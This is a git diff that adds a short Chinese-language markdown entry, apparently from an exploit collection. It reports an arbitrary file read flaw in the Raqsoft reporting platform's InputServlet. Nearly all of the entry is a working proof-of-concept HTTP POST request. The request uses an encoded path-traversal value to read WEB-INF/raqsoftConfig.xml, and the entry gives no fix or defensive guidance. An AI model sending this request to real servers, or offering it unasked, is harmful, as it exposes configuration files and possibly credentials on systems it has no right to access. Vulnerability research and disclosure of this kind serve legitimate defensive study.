diff --git "a/\346\266\246\344\271\276\346\212\245\350\241\250\345\271\263\345\217\260InputServlet\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/\346\266\246\344\271\276\346\212\245\350\241\250\345\271\263\345\217\260InputServlet\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" new file mode 100644 index 0000000..095482d --- /dev/null +++ "b/\346\266\246\344\271\276\346\212\245\350\241\250\345\271\263\345\217\260InputServlet\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" @@ -0,0 +1,14 @@ +## 润乾报表平台InputServlet存在任意文件读取漏洞 + + +## poc +``` +POST /InputServlet?action=13 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 +Content-Type: application/x-www-form-urlencoded +Connection: close + +file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config + +```